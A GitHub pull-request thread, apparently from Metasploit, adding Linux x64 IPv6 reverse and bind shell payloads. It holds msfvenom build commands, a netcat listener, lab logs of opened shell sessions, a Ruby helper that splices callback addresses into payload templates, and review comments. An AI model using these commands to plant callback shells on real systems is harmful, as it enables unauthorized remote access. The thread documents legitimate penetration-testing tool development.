
Add linux x64 ipv6 reverse shell #11039

Merged
merged 10 commits into from Feb 1, 2019

7 participants

epi052 commented Nov 29, 2018

Implements inline x86_64 Linux reverse Bourne shell over IPv6.

Verification

List the steps needed to make sure this thing works

  • Select IPv6 address ifconfig ...
  • Build executable ./msfvenom -p linux/x64/shell_reverse_ipv6_tcp LHOST='dead:beef:2::1009' -f elf -o test.elf
  • Start an IPv6 netcat listener nc -nvl6p 4444
  • Run binary ./test.elf
  • Run command to test shell works id

[image: connect syscall traced to view the sockaddr_in6 struct (eth0-scopeid)]

Demonstration

Create elf and upload to remote machine [image: loki-1]

Start listener and catch callback [image: loki-2]
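The offsets the author confirmed with strace are the layout of struct sockaddr_in6 on Linux x86_64: sin6_family at 0, sin6_port at 2 (network byte order), sin6_flowinfo at 4, the 16-byte sin6_addr at 8 and sin6_scope_id at 24, 28 bytes in all. The Ruby below is an added example, not code from this PR or from Metasploit; it packs and unpacks that struct from an LHOST/LPORT pair so the bytes a generator has to splice into the shellcode can be checked offline against what strace shows, and it refuses a link-local LHOST without an interface index because that is the case the scope id exists for. The function names, the AF_INET6 value (10 on Linux), the offset constants and the 0xAA placeholder used by `patch_template` are this example's own assumptions; real payload shellcode builds the struct with immediate moves rather than carrying it as one contiguous blob.

```ruby
require 'ipaddr'

# Linux x86_64 values, restated here so the example is stand-alone
# (assumed constants, not taken from the PR's shellcode).
AF_INET6 = 10
SOCKADDR_IN6_SIZE = 28
# struct sockaddr_in6 layout: sin6_family(2) sin6_port(2) sin6_flowinfo(4)
#                             sin6_addr(16)  sin6_scope_id(4)
OFF_FAMILY   = 0
OFF_PORT     = 2   # the lport offset the PR's second commit corrected
OFF_FLOWINFO = 4
OFF_ADDR     = 8
OFF_SCOPEID  = 24  # the scopeid offset the PR's second commit corrected

# Build the 28-byte sockaddr_in6 that connect(2) expects. sin6_family and
# sin6_scope_id are host byte order (little endian on x86_64), sin6_port is
# network byte order, sin6_flowinfo is left at zero.
def pack_sockaddr_in6(host, port, scope_id = 0)
  ip = IPAddr.new(host)
  raise ArgumentError, "not an IPv6 address: #{host}" unless ip.ipv6?
  raise ArgumentError, "port out of range: #{port}" unless (1..65_535).cover?(port)
  # A link-local callback address only makes sense with an interface index;
  # with scope_id 0 the connect fails, so refuse to emit it silently.
  if ip.link_local? && scope_id.zero?
    raise ArgumentError, "#{host} is link-local; pass the interface index as scope_id"
  end
  [AF_INET6, port, 0].pack('S<nL<') + ip.hton + [scope_id].pack('L<')
end

# Inverse: parse the struct back (for example the bytes strace prints for
# connect(), or bytes cut out of a generated payload) to confirm the offsets.
def unpack_sockaddr_in6(bytes)
  bytes = bytes.b
  unless bytes.bytesize == SOCKADDR_IN6_SIZE
    raise ArgumentError, "expected #{SOCKADDR_IN6_SIZE} bytes, got #{bytes.bytesize}"
  end
  family, port, flowinfo = bytes.unpack('S<nL<')
  raise ArgumentError, "family #{family} is not AF_INET6" unless family == AF_INET6
  {
    family:   family,
    port:     port,
    flowinfo: flowinfo,
    addr:     IPAddr.new_ntoh(bytes.byteslice(OFF_ADDR, 16)).to_s,
    scope_id: bytes.byteslice(OFF_SCOPEID, 4).unpack1('L<')
  }
end

# Simplified stand-in for the generator step: overwrite a 28-byte placeholder
# in a template with the struct for the requested LHOST/LPORT/scope id.
# The 0xAA marker is an assumption of this example, not a Metasploit convention.
PLACEHOLDER = ("\xAA" * SOCKADDR_IN6_SIZE).b

def patch_template(template, host, port, scope_id = 0)
  tmpl = template.b
  idx = tmpl.index(PLACEHOLDER)
  raise ArgumentError, 'placeholder not found in template' if idx.nil?
  tmpl[0, idx] + pack_sockaddr_in6(host, port, scope_id) +
    tmpl[(idx + SOCKADDR_IN6_SIZE)..-1]
end

if $PROGRAM_NAME == __FILE__
  # LHOST/LPORT from the PR's verification steps
  sa = pack_sockaddr_in6('dead:beef:2::1009', 4444)
  puts sa.unpack1('H*')        # hex of the struct, compare with strace output
  p unpack_sockaddr_in6(sa)
end
```

The hex the script prints can be compared byte for byte with the `connect(3, {sa_family=AF_INET6, sin6_port=htons(4444), ...}, 28)` line strace shows for the running payload; a port or scope id landing at the wrong offset shows up immediately as a mismatch in `unpack_sockaddr_in6`.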

epi052 added some commits Nov 29, 2018

Add Linux x86_64 IPv6 Inline Reverse Shell
Implements inline x86_64 Linux reverse Bourne shell over IPv6.
Fixed lport and scopeid offsets.
Offsets for scopeid and lport were incorrect in the previous commit.
Updated offsets to the correct values.  Confirmed by viewing the connect
syscall values with strace.

Green-m added the payload label Nov 30, 2018

Add Linux x86_64 IPv6 Inline Bind Shell
Implements inline x86_64 Linux Bourne bind shell over IPv6.

sempervictus commented Dec 3, 2018

Any chance you could implement via metasm in lib? Makes for much more reusable shellcode.
Thanks for pushing this.


epi052 commented Dec 4, 2018

I looked through the other payloads for examples. Are you asking for something similar to
metasploit-framework/modules/payloads/stages/linux/x64/meterpreter.rb?

All of the payloads I could find appear to have the assembly as a string, then a call to Metasm::Shellcode.assemble

Is that all you're looking for?


OJ commented Dec 4, 2018

Implement shellcode via metasm in lib.
Per the linked request
    #11039 (comment)
Rewrote previous payload module to make use of metasm for more reusable
shellcode.

epi052 commented Dec 5, 2018

Finished the bind shell. Mind taking a look at that before I do the reverse?

epi052 added some commits Dec 6, 2018

Implement reverse_ipv6 shellcode via metasm in lib.
Per the linked request
    #11039 (comment)
Rewrote previous version of payload module to make use of metasm for
more reusable shellcode.

epi052 commented Dec 7, 2018

Both ipv6 payloads should be good to go.

Gemfile Outdated
@@ -1,4 +1,5 @@
source 'https://rubygems.org'
gem 'pry'
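Review bot: the `gem 'pry'` line added to the framework's top-level Gemfile is unrelated to the payload this PR adds and changes the dependency set for every user; drop this hunk. If a debugger were wanted at all it belongs in a development-only group, not as an unconditional runtime dependency.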

busterb Dec 10, 2018
We probably don't need this in this PR.

sempervictus Dec 10, 2018
Isn't pry already part of MSF? Or is that just a dev group thing?

epi052 (Author) Dec 10, 2018
I worked myself into a detached head state as far as git is concerned. Had never seen that and googled how to get the work I'd done back into the proper branch. The fix action snuck this little guy in. I never explicitly git added the Gemfile, however it got included and I didn't realize. I'll get it out of the PR shortly. Sorry about that.

epi052 (Author) Dec 11, 2018
Removed the modified Gemfile.

tcp_port.pop # removes the first useless / from the array
tcp_port.shift # removes the last useless / from the array
tcp_port = (port_order.map{|x| tcp_port[x]}).join('') # reorder the array and convert it to a string.
binding.pry
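Review bot: `binding.pry` on the last line is a leftover debugger breakpoint; with pry loaded it halts every payload generation at this point, and without it the call raises NoMethodError, so remove it. The two comments above it are also swapped: Array#pop removes the last element and Array#shift removes the first, so `tcp_port.pop` should be annotated "removes the last useless /" and `tcp_port.shift` "removes the first useless /".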

wchen-r7 Dec 14, 2018
forgot something?

epi052 (Author) Dec 14, 2018
It appears so. I removed it from this branch/pull request. It looks like I need to go to git school... I clearly jacked something up. I wanted the two pull requests to be separate branches and separate work. However, it didn't work out that way. I'm sure it was user-error on my part. Thanks for checking it over.

I ended up getting both bind payloads in both branches exactly the same. Sorry again for the confusion.


epi052 (Author) Dec 14, 2018
Along the same lines, what should I do about the other PR, since this one has both payloads anyway?

bwatters-r7 Dec 18, 2018
We could close the other, or fix this one. Closing the other would likely be easier, but it is up to you.

epi052 (Author) Dec 20, 2018
Closed the other PR. Please let me know if anything else is needed on my end.

epi052 referenced this pull request Dec 20, 2018: Add linux x64 ipv6 bind shell #11047 (Closed)

epi052 commented Jan 24, 2019

I know you all have been doing great things getting MSF 5.0 out and obviously been busy. Just wanted to check in and see if there was anything I still needed to do for this. Thanks!


bwatters-r7 commented Feb 1, 2019

tmoose@ubuntu:~/rapid7/metasploit-framework$ ./msfvenom -p linux/x64/shell_reverse_ipv6_tcp -o revtcp_shell_ipv6.elf -f elf LHOST=fd34:fe56:7891:2f3a:eca2:a4dc:58c7:b176 LPORT=4567
[-] No platform was selected, choosing Msf::Module::Platform::Linux from the payload
[-] No arch selected, selecting arch: x64 from the payload
No encoder or badchars specified, outputting raw payload
Payload size: 90 bytes
Final size of elf file: 210 bytes
Saved as: revtcp_shell_ipv6.elf
On branch land-11039
nothing to commit, working directory clean
msf5 exploit(multi/handler) > set payload linux/x64/shell_reverse_ipv6_tcp
payload => linux/x64/shell_reverse_ipv6_tcp
msf5 exploit(multi/handler) > set lhost fd34:fe56:7891:2f3a:eca2:a4dc:58c7:b176
lhost => fd34:fe56:7891:2f3a:eca2:a4dc:58c7:b176
msf5 exploit(multi/handler) > set lport 4567
lport => 4567
msf5 exploit(multi/handler) > run

[*] Started reverse TCP handler on fd34:fe56:7891:2f3a:eca2:a4dc:58c7:b176:4567 
[*] Command shell session 1 opened (fd34:fe56:7891:2f3a:eca2:a4dc:58c7:b176:4567 -> fd34:fe56:7891:2f3b:e5bf:bfc3:683c:74ee:57284) at 2019-02-01 11:34:40 -0600

id
uid=1000(msfuser) gid=1000(msfuser) groups=1000(msfuser),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),116(lpadmin),126(sambashare)
pwd
/home/msfuser
ifconfig
ens32: flags=4163<UP,BROADCAST,RUNNING,MULTICAST>  mtu 1500
        inet 192.168.134.159  netmask 255.255.255.0  broadcast 192.168.134.255
        inet6 fd34:fe56:7891:2f3b:f533:e23e:76b8:b9be  prefixlen 64  scopeid 0x0<global>
        inet6 fe80::fdb9:5fa4:bd3a:780c  prefixlen 64  scopeid 0x20<link>
        inet6 fd34:fe56:7891:2f3b:e5bf:bfc3:683c:74ee  prefixlen 64  scopeid 0x0<global>
        ether 00:0c:29:08:11:58  txqueuelen 1000  (Ethernet)
        RX packets 192837  bytes 284112864 (284.1 MB)
        RX errors 0  dropped 0  overruns 0  frame 0
        TX packets 117283  bytes 9710710 (9.7 MB)
        TX errors 0  dropped 0 overruns 0  carrier 0  collisions 0

lo: flags=73<UP,LOOPBACK,RUNNING>  mtu 65536
        inet 127.0.0.1  netmask 255.0.0.0
        inet6 ::1  prefixlen 128  scopeid 0x10<host>
        loop  txqueuelen 1000  (Local Loopback)
        RX packets 373  bytes 29862 (29.8 KB)
        RX errors 0  dropped 0  overruns 0  frame 0
        TX packets 373  bytes 29862 (29.8 KB)
        TX errors 0  dropped 0 overruns 0  carrier 0  collisions 0

bwatters-r7 commented Feb 1, 2019

rapid7/metasploit-framework$ ./msfvenom -p linux/x64/shell_bind_ipv6_tcp -o bindtcp_shell_ipv6.elf -f elf LPORT=4567
msf5 exploit(multi/handler) > show options

Module options (exploit/multi/handler):

   Name  Current Setting  Required  Description
   ----  ---------------  --------  -----------


Payload options (linux/x64/shell_bind_ipv6_tcp):

   Name   Current Setting                          Required  Description
   ----   ---------------                          --------  -----------
   LPORT  4567                                     yes       The listen port
   RHOST  fd34:fe56:7891:2f3b:f533:e23e:76b8:b9be  no        The target address


Exploit target:

   Id  Name
   --  ----
   0   Wildcard Target


msf5 exploit(multi/handler) > run

[*] Started bind TCP handler against fd34:fe56:7891:2f3b:f533:e23e:76b8:b9be:4567
[*] Command shell session 4 opened (fd34:fe56:7891:2f3a:eca2:a4dc:58c7:b176:39182 -> fd34:fe56:7891:2f3b:f533:e23e:76b8:b9be:4567) at 2019-02-01 15:50:15 -0600

id
uid=1000(msfuser) gid=1000(msfuser) groups=1000(msfuser),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),116(lpadmin),126(sambashare)
pwd
/home/msfuser
exit
[*] fd34:fe56:7891:2f3b:f533:e23e:76b8:b9be - Command shell session 4 closed.

bwatters-r7 self-assigned this Feb 1, 2019

bwatters-r7 merged commit cb3ea8d into rapid7:master Feb 1, 2019

3 checks passed

  • Metasploit Automation - Sanity Test Execution: Successfully completed all tests.
  • Metasploit Automation - Test Execution: Successfully completed all tests.
  • continuous-integration/travis-ci/pr: The Travis CI build passed

bwatters-r7 added a commit that referenced this pull request Feb 1, 2019

Land #11039, Add linux x64 ipv6 reverse shell
Merge branch 'land-11039' into upstream-master

bwatters-r7 commented Feb 1, 2019

Release Notes

This PR adds two new linux x64 IPv6 shell payloads: reverse and bind.

msjenkins-r7 added a commit that referenced this pull request Feb 1, 2019

Land #11039, Add linux x64 ipv6 reverse shell
Merge branch 'land-11039' into upstream-master